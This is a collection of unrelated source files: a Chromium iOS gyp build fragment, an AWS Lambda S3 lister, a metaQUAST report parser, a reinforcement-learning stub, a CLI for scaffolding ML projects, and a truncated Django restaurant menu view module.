'browser/ui/reversed_animation.h',
'browser/ui/reversed_animation.mm',
'browser/ui/rtl_geometry.h',
'browser/ui/rtl_geometry.mm',
'browser/ui/show_mail_composer_util.h',
'browser/ui/show_mail_composer_util.mm',
'browser/ui/show_privacy_settings_util.h',
'browser/ui/show_privacy_settings_util.mm',
'browser/ui/side_swipe_gesture_recognizer.h',
'browser/ui/side_swipe_gesture_recognizer.mm',
'browser/ui/size_class_support_util.h',
'browser/ui/size_class_support_util.mm',
'browser/ui/ui_util.h',
'browser/ui/ui_util.mm',
'browser/ui/uikit_ui_util.h',
'browser/ui/uikit_ui_util.mm',
'browser/ui/url_loader.h',
'browser/ui/webui/about_ui.cc',
'browser/ui/webui/about_ui.h',
'browser/ui/webui/crashes_ui.cc',
'browser/ui/webui/crashes_ui.h',
'browser/ui/webui/flags_ui.cc',
'browser/ui/webui/flags_ui.h',
'browser/ui/webui/gcm/gcm_internals_ui.cc',
'browser/ui/webui/gcm/gcm_internals_ui.h',
'browser/ui/webui/net_export/net_export_ui.cc',
'browser/ui/webui/net_export/net_export_ui.h',
'browser/ui/webui/sync_internals/sync_internals_message_handler.cc',
'browser/ui/webui/sync_internals/sync_internals_message_handler.h',
'browser/ui/webui/sync_internals/sync_internals_ui.cc',
'browser/ui/webui/sync_internals/sync_internals_ui.h',
'browser/ui/webui/version_handler.cc',
'browser/ui/webui/version_handler.h',
'browser/ui/webui/version_ui.cc',
'browser/ui/webui/version_ui.h',
'browser/undo/bookmark_undo_service_factory.cc',
'browser/undo/bookmark_undo_service_factory.h',
'browser/updatable_config/updatable_array.h',
'browser/updatable_config/updatable_array.mm',
'browser/updatable_config/updatable_config_base.h',
'browser/updatable_config/updatable_config_base.mm',
'browser/updatable_config/updatable_dictionary.h',
'browser/updatable_config/updatable_dictionary.mm',
'browser/update_client/ios_chrome_update_query_params_delegate.cc',
'browser/update_client/ios_chrome_update_query_params_delegate.h',
'browser/variations/ios_chrome_variations_service_client.cc',
'browser/variations/ios_chrome_variations_service_client.h',
'browser/web/dom_altering_lock.h',
'browser/web/dom_altering_lock.mm',
'browser/web/web_view_type_util.h',
'browser/web/web_view_type_util.mm',
'browser/web_data_service_factory.cc',
'browser/web_data_service_factory.h',
'browser/web_resource/web_resource_util.cc',
'browser/web_resource/web_resource_util.h',
'browser/xcallback_parameters.h',
'browser/xcallback_parameters.mm',
],
'conditions': [
['enable_rlz==1', {
'dependencies': [
'../../components/components.gyp:rlz',
'ios_chrome_browser_rlz',
],
}],
['safe_browsing!=0', {
'sources': [
'browser/safe_browsing/hit_report.cc',
'browser/safe_browsing/hit_report.h',
'browser/safe_browsing/ping_manager.cc',
'browser/safe_browsing/ping_manager.h',
'browser/safe_browsing/protocol_manager_helper.cc',
'browser/safe_browsing/protocol_manager_helper.h',
'browser/safe_browsing/safe_browsing_blocking_page.cc',
'browser/safe_browsing/safe_browsing_blocking_page.h',
'browser/safe_browsing/safe_browsing_service.cc',
'browser/safe_browsing/safe_browsing_service.h',
'browser/safe_browsing/ui_manager.cc',
'browser/safe_browsing/ui_manager.h',
'browser/safe_browsing/util.cc',
'browser/safe_browsing/util.h',
],
'dependencies': [
'../../crypto/crypto.gyp:crypto',
'ios_chrome_safe_browsing_proto',
],
}]
],
# TODO(crbug.com/569158): Suppresses warnings that are treated as errors
# when minimum iOS version support is increased to iOS 9 and up.
# This should be removed once all deprecation violations have been fixed.
'xcode_settings': {
'WARNING_CFLAGS': [
'-Wno-deprecated-declarations',
],
},
},
{
# GN version: //ios/chrome/browser:about_flags
# This is a separate target so that the 'defines' does not leak to the
# other files (which would increase the compilation time when changing
# the value).
'target_name': 'ios_chrome_browser_about_flags',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../components/components.gyp:autofill_core_common',
'../../components/components.gyp:dom_distiller_core',
'../../components/components.gyp:enhanced_bookmarks',
'../../components/components.gyp:flags_ui',
'../../components/components.gyp:sync_driver',
'../../components/components_strings.gyp:components_strings',
'../../google_apis/google_apis.gyp:google_apis',
'../web/ios_web.gyp:ios_web',
'ios_chrome_resources.gyp:ios_strings_gen',
],
'sources': [
'browser/about_flags.h',
'browser/about_flags.mm',
],
'defines': [
'GOOGLE_STAGING_API_URL="<(google_staging_api_url)"',
'GOOGLE_STAGING_LSO_URL="<(google_staging_lso_url)"',
'GOOGLE_TEST_API_URL="<(google_test_api_url)"',
'GOOGLE_TEST_LSO_URL="<(google_test_lso_url)"',
'GOOGLE_TEST_OAUTH_CLIENT_ID="<(google_test_oauth_client_id)"',
'GOOGLE_TEST_OAUTH_CLIENT_SECRET="<(google_test_oauth_client_secret)"',
'GOOGLE_TEST_OAUTH_URL="<(google_test_oauth_url)"',
'GOOGLE_TEST_SYNC_URL="<(google_test_sync_url)"',
],
'variables': {
'google_staging_api_url%': '',
'google_staging_lso_url%': '',
'google_test_api_url%': '',
'google_test_lso_url%': '',
'google_test_oauth_client_id%': '',
'google_test_oauth_client_secret%': '',
'google_test_oauth_url%': '',
'google_test_sync_url%': '',
},
},
{
# GN version: //ios/chrome/common
'target_name': 'ios_chrome_common',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../components/components.gyp:version_info',
'app_group_mainapp',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
],
},
'sources': [
'common/channel_info.h',
'common/channel_info.mm',
'common/string_util.h',
'common/string_util.mm',
],
},
{
# GN version: //ios/chrome/browser:injected_js
'target_name': 'injected_js',
'type': 'none',
'sources': [
'browser/find_in_page/resources/find_in_page.js',
'browser/passwords/resources/credential_manager.js',
'browser/passwords/resources/password_controller.js',
],
'includes': [ '../../ios/web/js_compile.gypi' ],
'link_settings': {
'mac_bundle_resources': [
'<(SHARED_INTERMEDIATE_DIR)/credential_manager.js',
'<(SHARED_INTERMEDIATE_DIR)/find_in_page.js',
'<(SHARED_INTERMEDIATE_DIR)/password_controller.js',
],
},
},
{
# GN version: //ios/chrome/common/app_group
'target_name': 'app_group_common',
'type': 'static_library',
'sources': [
'common/app_group/app_group_constants.h',
'common/app_group/app_group_constants.mm',
'common/app_group/app_group_metrics.h',
'common/app_group/app_group_metrics.mm',
],
'dependencies': [
# This target will be included into application extensions and the list
# of its dependencies must be kept as short as possible.
'../../base/base.gyp:base',
'../../components/components.gyp:version_info',
],
'include_dirs': [
'../..',
],
},
{
# GN version: //ios/chrome/common/app_group:client
'target_name': 'app_group_client',
'type': 'static_library',
'sources': [
'common/app_group/app_group_metrics_client.h',
'common/app_group/app_group_metrics_client.mm',
],
'dependencies': [
# This target will be included into application extensions and the list
# of its dependencies must be kept as short as possible.
'app_group_common',
],
'include_dirs': [
'../..',
],
},
{
# GN version: //ios/chrome/common/app_group:main_app
'target_name': 'app_group_mainapp',
'type': 'static_library',
'sources': [
'common/app_group/app_group_metrics_mainapp.h',
'common/app_group/app_group_metrics_mainapp.mm',
],
'dependencies': [
'app_group_common',
],
'include_dirs': [
'../..',
],
},
],
'conditions': [
['enable_rlz_support==1', {
'targets': [
{
# GN version: //ios/chrome/browser/rlz
'target_name': 'ios_chrome_browser_rlz',
'type': 'static_library',
'sources': [
'browser/rlz/rlz_tracker_delegate_impl.cc',
'browser/rlz/rlz_tracker_delegate_impl.h',
],
'dependencies': [
'../../components/components.gyp:google_core_browser',
'../../components/components.gyp:omnibox_browser',
'../../components/components.gyp:rlz',
'../../components/components.gyp:search_engines',
'../../rlz/rlz.gyp:rlz_lib',
],
},
],
}],
['safe_browsing!=0', {
'targets': [
{
# GN version: //ios/chrome/browser/safe_browsing:proto
'target_name': 'ios_chrome_safe_browsing_proto',
'type': 'static_library',
'sources': [ 'browser/safe_browsing/metadata.proto' ],
'variables': {
'proto_in_dir': 'browser/safe_browsing',
'proto_out_dir': 'ios/chrome/browser/safe_browsing',
},
'includes': [ '../../build/protoc.gypi' ],
},
],
}],
],
}
|
import boto3
import json
import os
def lambda_handler(event, context):
bucket = os.environ['BUCKET']
path = 'batch-incoming/'
resp = boto3.client('s3').list_objects_v2(
Bucket=bucket,
Prefix=path,
MaxKeys=1000
)
keys = list()
if 'Contents' in resp:
for content in resp['Contents']:
if len(content['Key']) > 5 and content['Key'][-4:] == '.csv':
keys.append(content['Key'])
if len(keys) == 0:
# Cancel execution if no files
boto3.client('stepfunctions').stop_execution(
executionArn=event['ExecutionId'],
error='There are no files to process',
cause=f'No files were found in the s3://{bucket}/{path}.'
)
return json.dumps({
"Bucket": bucket,
"Keys": keys
})
|
#!/usr/bin/env python
from __future__ import print_function
import sys,os
import re
import argparse
import logging
desc = 'Converting "contigs_report_contigs_filtered.mis_contigs.info" to a tsv table'
epi = """DESCRIPTION:
Only mis-assembly contigs will be included.
Output table columns:
*) contig ID
*) misassembly type(s)
Output is written to STDOUT
"""
parser = argparse.ArgumentParser(description=desc,
epilog=epi,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('report_file', metavar='report_file', type=str,
help='"contigs_report_contigs_filtered.mis_contigs.info" file created by metaQUAST')
parser.add_argument('--version', action='version', version='0.0.1')
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)
def main(args):
# Note: the report can have multiple misassmblies per contig
print('\t'.join(['Contig', 'Extensive_misassembly']))
report = {}
with open(args.report_file) as inF:
contigID = None
for line in inF:
line = line.rstrip()
if line.startswith('Extensive misassembly'):
mis = line.split('(')[1].split(',')[0].split(')')[0].replace(' ', '_')
try:
report[contigID].append(mis)
except KeyError:
report[contigID] = [mis]
else:
contigID = line
for k,v in report.items():
print('\t'.join([k, ';'.join(v)]))
if __name__ == '__main__':
args = parser.parse_args()
main(args)
|
from ezcoach import Runner
from ezcoach.agent import Learner
from ezcoach.enviroment import Manifest
class RandomAlgorithm(Learner):
def __init__(self, num_episodes):
self._num_episodes = num_episodes
self._manifest: Manifest = None
def do_start_episode(self, episode: int) -> bool:
return episode <= self._num_episodes
def initialize(self, manifest: Manifest):
self._manifest = manifest
def act(self, state):
return self._manifest.actions_definition.random()
if __name__ == '__main__':
random_agent = RandomAlgorithm(10)
runner = Runner(random_agent, verbose=1)
runner.train()
|
from .docs_index_generator import make_doc_index
from .log_generator import parse_md, generate_log
from bs4 import BeautifulSoup
from distutils.dir_util import copy_tree
from jinja2 import Template
from glob import glob
import janus
import mistune
import os
import re
import sys
import shutil
def parse():
parser = janus.ArgParser()
# ===== PROJECT =====
project_parser = parser.new_cmd('project',
'Project command',
project_command)
new_project_parser = project_parser.new_cmd('new',
'Creates new project',
project_new_command)
new_project_parser.new_str('n name')
new_project_parser.new_str('v version', fallback='0.0.1')
new_project_parser.new_str('a author', fallback='Surf')
new_project_parser.new_str('l licence', fallback='MIT')
new_project_parser.new_str('d description', fallback='')
new_project_parser.new_str('p path', fallback='.')
# ===== EXPERIMENT =====
experiment_parser = parser.new_cmd('exp',
'Experiment command',
experiment_command)
new_exp_parser = experiment_parser.new_cmd('new',
'Creates new experiment',
new_experiment_command)
new_exp_parser.new_str('n name')
new_exp_parser.new_str('a author')
new_exp_parser.new_str('t task', fallback='')
new_exp_parser.new_str('p path', fallback='.')
list_exp_parser = experiment_parser.new_cmd('list',
'List all experiments',
list_experiments_command)
list_exp_parser.new_str('p path', fallback='.')
list_exp_parser.new_flag('a author')
list_exp_parser.new_flag('t task')
# ===== ENVIRONMENTS =====
env_parser = parser.new_cmd('env',
'Environment command',
env_command)
new_env_parser = env_parser.new_cmd('new',
'Creates new environment',
create_env_command)
new_env_parser.new_str('n name', fallback='')
new_env_parser.new_str('p path', fallback='.')
env_parser.new_cmd('list',
'Shows kernels environment',
show_env_command)
delete_env_parser = env_parser.new_cmd('delete',
'Delete current environment',
delete_env_command)
delete_env_parser.new_str('n name', fallback='')
delete_env_parser.new_str('p path', fallback='.')
# ===== LOG =====
log_parser = parser.new_cmd('log',
'Log command',
log_command)
new_log_parser = log_parser.new_cmd('new',
'Creates new project log',
create_log_command)
new_log_parser.new_str('p path', fallback='.')
archive_log_parser = log_parser.new_cmd('archive',
'Archives log',
arch_log_command)
archive_log_parser.new_str('n name', fallback='')
archive_log_parser.new_str('p path', fallback='.')
archive_log_parser.new_str('w password', fallback='')
# ===== DOC =====
doc_parser = parser.new_cmd('docs',
'Docs command',
doc_command)
doc_parser.new_str('p path', fallback='.')
# # # END # # #
parser.parse()
# =====================================================================
def project_command(p):
if p.has_cmd():
return
print('PROJECT COMMAND HELP')
print('Usage:')
print(' > ocean project new ...')
print(' -n --name : Project name like "Cute kittens". Must be provided.')
print(' -v --version : Version. Default: "0.0.1".')
print(' -a --author : Author. Default: "Surf".')
print(' -l --licence : License. Default: "MIT".')
print(' -d --description : Description. Default: "".')
print(' -p --path : Path. Default: ".", which is the current directory.')
def project_new_command(p):
name = p['name']
version = p['version']
author = p['author']
licence = p['licence']
description = p['description']
path = os.path.abspath(p['path'])
short_name = ''.join([_capitalizeOne(w) for w in name.split()])
short_name = short_name[0].lower() + short_name[1:]
create_project(name=name, short_name=short_name, author=author,
description=description, version=version, licence=licence,
path=path)
def experiment_command(p):
if p.has_cmd():
return
print('EXPERIMENT COMMAND HELP')
print('Usage:')
print(' > ocean exp new ... - Creates new experiment')
print(' -n --name : Experiment name like "Boosting". Must be provided.')
print(' -a --author : Author. Must be provided')
print((' -t --task : Task of an experiment. Default: "", so '
'the one can specify it later on.'))
print((' -p --path : Path to the root folder, default is . (current folder). '
'Ocean performs search of an root folder automatically, so '
'you can perform this command in any nested folder.'
))
print(' > ocean exp list - List all experiments')
def new_experiment_command(p):
name = p['name']
if name is None:
print(('Experiment name must be provided. '
'Use "ocean exp new -n EXP_NAME -a AUTHOR" syntax'),
file=sys.stderr)
return
camel_name = _to_camel(name)
author = p['author']
if author is None:
print(('Author name must be provided. Use "ocean exp new '
'-n EXP_NAME -a AUTHOR" syntax'),
file=sys.stderr)
return
task = p['task']
if task == '':
task = 'Describe your task here.'
root = _sanitize_project_path(p)
if not root:
return
exps = os.path.join(root, 'experiments')
project_name = root.split('/')[-1]
exps_created = sorted(glob(os.path.join(exps, '*')))
used_names = [x.split('-', 2)[-1] for x in exps_created]
if name is used_names:
print('Experiment name must be unique!', file=sys.stderr)
return
if len(exps_created) == 0:
number = 1
else:
number = max([int(x.split('-')[1]) for x in exps_created]) + 1
number_string = '0'*(3-len(str(number))) + str(number)
exp_folder_name = 'exp-{0}-{1}'.format(number_string, camel_name)
from_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'exp-{{expNumber}}-{{expName}}')
to_path = os.path.join(exps, exp_folder_name)
copy_tree(from_path, to_path)
log_path = os.path.join(to_path, 'log.md')
with open(log_path) as f:
text = f.read()
text_rendered = Template(text).render(expNumber=number,
expName=name,
author=author,
task=task)
with open(log_path, 'w') as f:
f.write(text_rendered)
train_path = os.path.join(to_path, 'scripts/train.py')
with open(train_path) as f:
text = f.read()
text_rendered = Template(text).render(projectNameShort=project_name)
with open(train_path, 'w') as f:
f.write(text_rendered)
def list_experiments_command(p):
root = _sanitize_project_path(p)
if not root:
return
show_authors = p['author']
show_tasks = p['task']
exps = os.path.join(root, 'experiments')
if not os.path.exists(exps):
print('Haven\'t found the experiments folder in project\'s root',
file=sys.stderr)
return
exps = sorted(glob(os.path.join(exps, '*')))
results = []
for exp_folder in exps:
results.append(_parse_experiment(exp_folder, show_authors, show_tasks))
for item in results:
print(item['exp_name'])
if show_authors:
print('\tAuthor: {}'.format(item['author']))
if show_tasks:
print('\tTask: {}'.format(item['task']))
if show_authors or show_tasks:
print()
def _parse_experiment(folder, show_authors, show_tasks):
md_path = os.path.join(folder, 'log.md')
md = parse_md(md_path)
result = {}
result['exp_name'] = md.select_one('h1').text
if show_authors:
result['author'] = md.find('h2', text='Author').find_next('p').text
if show_tasks:
result['task'] = md.find('h2', text='Task').find_next('p').text
return result
def env_command(p):
if p.has_cmd():
return
print('ENVIRONMENT COMMAND HELP')
print('Usage:')
print(' > ocean env new ... - Creates new venv and relative Jupyter kernel for the experiment')
print((' -n --name : Environment name like "Doggie". '
'If not specified, experiment folder\'s name will be taken.'))
print((' -p --path : Path to the experiment folder, default is . (current folder). '
'Ocean performs search of an experiment\'s root folder automatically, so '
'you can perform this command in any nested folder.'
))
print(' > ocean env show - Shows list of all environments.')
print((' > ocean env delete - Delete current environment. '
'Additional parameters are same with `new` command'))
def create_env_command(p):
name = p['name']
exp_root = _sanitize_exp_path(p)
if not exp_root:
return
_create_kernel(exp_root, name)
def show_env_command(p):
cmd = 'jupyter kernelspec list'
os.system(cmd)
def delete_env_command(p):
name = p['name']
exp_root = _sanitize_exp_path(p)
if not exp_root:
return
_remove_kernel(exp_root, name)
def doc_command(p):
root = _sanitize_project_path(p)
if not root:
return
_generate_docs(root)
def log_command(p):
if p.has_cmd():
return
print('LOG COMMAND HELP')
print('Usage:')
print(' > ocean log new - Creates project log')
print(' > ocean log archive ... - Archives existing project log')
print(' -n --name : Name of the archive like "result". Must be provided.')
print(' -p --password : Password. Default is "" - no password.')
def create_log_command(p):
root = _sanitize_project_path(p)
if root is None:
return
generate_log(root)
def arch_log_command(p):
root = _sanitize_project_path(p)
if root is None:
return
password = p['password']
name = p['name']
cmds = ['zip']
if password != '':
cmds.append('-P {}'.format(password))
if name != '':
cmds.append('-r {}.zip'.format(name))
else:
cmds.append('-r {}.zip'.format(root.split('/')[-1]))
cmds.append(os.path.join(root, 'project_log'))
cmd = ' '.join(cmds)
print(cmd)
os.system(cmd)
# =====================================================================
def create_project(name, short_name, author, description,
version, licence, path):
# 1. Copying template itself and renaming the root
root = _copy_template(path, short_name)
# 2. Readme
_render_readme(root, name, author, description)
# 3. Setup
_render_setup_py(root, short_name, version, description, author, licence)
# 4. Source folder
_rename_src_folder(root, short_name)
# 5. Documentation
docs_dir = _generate_sphinx_docs(root, name, author, version)
# 6. Documentation's configuration
_change_sphinx_config(docs_dir)
# 7. Generate docs
_generate_docs(root)
# 8. Install project package by default
_install_as_package(root)
def _copy_template(path, short_name):
from_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'{{projectNameShort}}')
to_dir = os.path.join(path, short_name)
copy_tree(from_dir, to_dir)
return to_dir
def _render_readme(root, name, author, description):
_render_file_inplace(path=os.path.join(root, 'README.md'),
replace_dict={
'projectName': name,
'author': author,
'projectDescription': description
})
def _render_setup_py(root, short_name, version, description, author, licence):
_render_file_inplace(path=os.path.join(root, 'setup.py'),
replace_dict={
'projectNameShort': short_name,
'version': version,
'projectDescriptionShort': description,
'author': author,
'licence': licence
})
def _rename_src_folder(root, short_name):
src_dir_from = os.path.join(root, '{{projectNameShort}}')
src_dir_to = os.path.join(root, short_name)
shutil.move(src_dir_from, src_dir_to)
def _generate_sphinx_docs(root, name, author, version):
docs_dir = os.path.join(root, 'docs')
command = ('cd {0} && '
'sphinx-apidoc -o . .. -FEP -H "{1}" -A "{2}" -V "{3}" '
'>/dev/null')\
.format(docs_dir, name, author, version)
os.system(command)
return docs_dir
def _change_sphinx_config(docs_dir):
new_config = []
project_name = None
to_find = ['import os', 'import sys', 'sys.path.insert']
to_append = ['import os\n', 'import sys\n', 'sys.path.insert(0, "..")\n']
conf_file_path = os.path.join(docs_dir, 'conf.py')
if not os.path.exists(conf_file_path):
print('`sphinx apidoc` failed, check sphinx installaton')
return
with open(conf_file_path) as f:
config = f.readlines()
for line in config:
found = False
for i in range(len(to_find)):
if to_find[i] in line:
found = True
new_config.append(to_append[i])
break
if not found:
new_config.append(line)
capts = re.findall(r'project\s+\=\s+\'(.+)\'', line, flags=re.I)
if len(capts) > 0:
project_name = capts[0]
new_config.append('autodoc_mock_imports = ["yaml", "numpy", "pandas"]\n')
new_config.append(('exclude_patterns = '
'["setup.rst", "{0}.rst", "{0}.data.rst"]\n').format(project_name))
with open(os.path.join(docs_dir, 'conf.py'), 'w') as f:
f.write(''.join(new_config))
def _generate_docs(root):
docs = os.path.join(root, 'docs')
index_rst = os.path.join(docs, 'index.rst')
if not os.path.exists(index_rst):
print('`sphinx apidoc` failed, check sphinx installaton')
return
make_doc_index(root_path=root, doc_index_path=index_rst)
cmd = 'cd {} && make html >/dev/null'.format(docs)
os.system(cmd)
def _install_as_package(root):
command = 'cd {0}; make -B package >/dev/null'.format(root)
os.system(command)
def _name_for_the_kernel(path, name):
full_foldername = os.path.abspath(path)
found, root_path = _find_ocean_root(full_foldername)
if found:
prefix = '{}_'.format(root_path.split('/')[-1])
else:
prefix = ''
folder = full_foldername.split('/')[-1]
name = folder if name == '' else name
name = prefix + name
return name, full_foldername
def _create_kernel(f, name=''):
name, full_foldername = _name_for_the_kernel(f, name)
cmd = ('cd {0} && '
'python3 -m venv env && '
'source env/bin/activate && '
'pip install ipykernel && '
'python -m ipykernel install --user --name "{1}" --display-name "Python ({1})" && '
'pip install -r requirements.txt && '
'deactivate'
).format(full_foldername, name)
os.system(cmd)
def _remove_kernel(f, name=''):
name, _ = _name_for_the_kernel(f, name)
s = (
'jupyter kernelspec uninstall "{0}" -f && '
'rm -rf env'
).format(name.lower())
os.system(s)
# =============================================================================
def _capitalizeOne(s):
return s[0].upper() + s[1:]
def _render_file_inplace(path, replace_dict):
with open(path) as f:
template = Template(f.read())
s = template.render(**replace_dict)
with open(path, 'w') as f:
f.write(s)
def _find_ocean_root(path):
return _find_root(path, '.ocean')
def _find_experiment_root(path):
return _find_root(path, '.exp')
def _find_root(path, hidden):
root = None
found = False
old_f = os.path.abspath(path)
f = os.path.dirname(old_f)
while f != old_f:
hidden_path = os.path.join(old_f, hidden)
if os.path.exists(hidden_path):
found = True
root = old_f
break
old_f = f
f = os.path.dirname(f)
return found, root
def _to_camel(s):
return ''.join(x[0].upper()+x[1:] for x in s.split())
def _sanitize_project_path(p):
path = p['path']
found, root = _find_ocean_root(path)
if not found:
print('Please specify project path via -p argument', file=sys.stderr)
return
return root
def _sanitize_exp_path(p):
found, exp_root = _find_experiment_root(p['path'])
if not found:
print('Please specify project path via -p argument', file=sys.stderr)
return
return exp_root
# =============================================================================
if __name__ == '__main__':
parse()
|
from django.shortcuts import render, redirect
from django.views.generic.edit import CreateView
from django.contrib import messages
from project.models import MenuItem, Feedback
from cart.forms import CartAddProductForm
from resto.forms import ReservationForm, ContactForm
from django.views.decorators.csrf import csrf_exempt
from django.core.paginator import Paginator
from utils import send_sms
from webpush import send_group_notification
def home(request):
feedback = Feedback.objects.order_by('-date')[:3]
item = MenuItem.objects.all()
Soepen = MenuItem.objects.filter(category="Soepen")
Voorgerechten = MenuItem.objects.filter(category="Voorgerechten")
Momo_gerechten = MenuItem.objects.filter(category="Momo gerechten")
Noodle_gerechten = MenuItem.objects.filter(category="Noodle gerechten")
Tandoori_gerechten = MenuItem.objects.filter(category="Tandoori gerechten")
Kipgerechten = MenuItem.objects.filter(category="Kipgerechten")
Lamsgerechten = MenuItem.objects.filter(category="Lamsgerechten")
Zeevruchten_gerechten = MenuItem.objects.filter(category="Zeevruchten gerechten")
Vegetarische_gerechten = MenuItem.objects.filter(category="Vegetarische gerechten")
Biryani_gerechten = MenuItem.objects.filter(category="Biryani gerechten")
Extra = MenuItem.objects.filter(category="Extra's")
Indiaas_brood = MenuItem.objects.filter(category="Indiaas brood")
Nagerechten = MenuItem.objects.filter(category="Nagerechten")
Dranken = MenuItem.objects.filter(category="Dranken")
return render(request, "index.html",{'item':item,'Soepen':Soepen, 'Voorgerechten': Voorgerechten, 'Momo_gerechten': Momo_gerechten, 'Noodle_gerechten': Noodle_gerechten, 'Tandoori_gerechten': Tandoori_gerechten, 'Kipgerechten': Kipgerechten, 'Lamsgerechten': Lamsgerechten,'Zeevruchten_gerechten': Zeevruchten_gerechten, 'Vegetarische_gerechten': Vegetarische_gerechten, 'Biryani_gerechten': Biryani_gerechten, 'Extra': Extra, 'Indiaas_brood':Indiaas_brood, 'Nagerechten':Nagerechten, 'Dranken':Dranken, 'feedback': feedback,})
def menu1(request):
item = MenuItem.objects.filter(Menu_type="Home Delivery")
Soepen = MenuItem.objects.filter(Menu_type="Home Delivery", category="Soepen")
Voorgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Voorgerechten")
Momo_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Momo gerechten")
Noodle_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Noodle gerechten")
Tandoori_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Tandoori gerechten")
Kipgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Kipgerechten")
Lamsgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Lamsgerechten")
Zeevruchten_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Zeevruchten gerechten")
Vegetarische_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Vegetarische gerechten")
Biryani_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Biryani gerechten")
Extra = MenuItem.objects.filter(Menu_type="Home Delivery", category="Extra's")
Indiaas_brood = MenuItem.objects.filter(Menu_type="Home Delivery", category="Indiaas brood")
Nagerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Nagerechten")
Dranken = MenuItem.objects.filter(Menu_type="Home Delivery", category="Dranken")
cart_product_form = CartAddProductForm()
return render(request, "menu1.html",
{'item': item, 'Soepen':Soepen, 'Voorgerechten': Voorgerechten, 'Momo_gerechten': Momo_gerechten, 'Noodle_gerechten': Noodle_gerechten, 'Tandoori_gerechten': Tandoori_gerechten, 'Kipgerechten': Kipgerechten, 'Lamsgerechten': Lamsgerechten,
'Zeevruchten_gerechten': Zeevruchten_gerechten, 'Vegetarische_gerechten':Vegetarische_gerechten, 'Biryani_gerechten': Biryani_gerechten, 'Extra': Extra, 'Indiaas_brood':Indiaas_brood, 'Nagerechten':Nagerechten, 'Dranken':Dranken, 'cart_product_form':cart_product_form })
def menu3(request):
item = MenuItem.objects.filter(Menu_type="Takeaway")
Soepen = MenuItem.objects.filter(Menu_type="Takeaway", category="Soepen")
Nepali_menu = MenuItem.objects.filter(Menu_type="Takeaway", category="Nepali Menu")
Voorgerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Voorgerechten")
Momo_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Momo gerechten")
Noodle_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Noodle gerechten")
Tandoori_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Tandoori gerechten")
Kipgerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Kipgerechten")
Lamsgerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Lamsgerechten")
Zeevruchten_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Zeevruchten gerechten")
Vegetarische_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Vegetarische gerechten")
Biryani_gerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Biryani gerechten")
Extra = MenuItem.objects.filter(Menu_type="Takeaway", category="Extra's")
Indiaas_brood = MenuItem.objects.filter(Menu_type="Takeaway", category="Indiaas brood")
Nagerechten = MenuItem.objects.filter(Menu_type="Takeaway", category="Nagerechten")
Dranken = MenuItem.objects.filter(Menu_type="Takeaway", category="Dranken")
cart_product_form = CartAddProductForm()
return render(request, "menu3.html",
{'item': item, 'Soepen':Soepen, 'Voorgerechten': Voorgerechten, 'Momo_gerechten': Momo_gerechten, 'Noodle_gerechten': Noodle_gerechten, 'Tandoori_gerechten': Tandoori_gerechten, 'Kipgerechten': Kipgerechten, 'Lamsgerechten': Lamsgerechten, 'Nepali_menu': Nepali_menu,
'Zeevruchten_gerechten': Zeevruchten_gerechten, 'Vegetarische_gerechten':Vegetarische_gerechten, 'Biryani_gerechten': Biryani_gerechten, 'Extra': Extra, 'Indiaas_brood':Indiaas_brood, 'Nagerechten':Nagerechten, 'Dranken':Dranken, 'cart_product_form':cart_product_form })
def menu2(request):
item = MenuItem.objects.filter(Menu_type="Home Delivery")
Soepen = MenuItem.objects.filter(Menu_type="Home Delivery", category="Soepen")
Voorgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Voorgerechten")
Momo_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Momo gerechten")
Noodle_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Noodle gerechten")
Tandoori_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Tandoori gerechten")
Kipgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Kipgerechten")
Lamsgerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Lamsgerechten")
Zeevruchten_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Zeevruchten gerechten")
Vegetarische_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Vegetarische gerechten")
Biryani_gerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Biryani gerechten")
Extra = MenuItem.objects.filter(Menu_type="Home Delivery", category="Extra's")
Indiaas_brood = MenuItem.objects.filter(Menu_type="Home Delivery", category="Indiaas brood")
Nagerechten = MenuItem.objects.filter(Menu_type="Home Delivery", category="Nagerechten")
Dranken = MenuItem.objects.filter(Menu_type="Home Delivery", category="Dranken")
cart_product_form = CartAddProductForm()
return render(request, "menu2.html",
{'item': item, 'Soepen':Soepen, 'Voorgerechten': Voorgerechten, 'Momo_gerechten': Momo_gerechten, 'Noodle_gerechten': Noodle_gerechten, 'Tandoori_gerechten': Tandoori_gerechten, 'Kipgerechten': Kipgerechten, 'Lamsgerechten': Lamsgerechten,
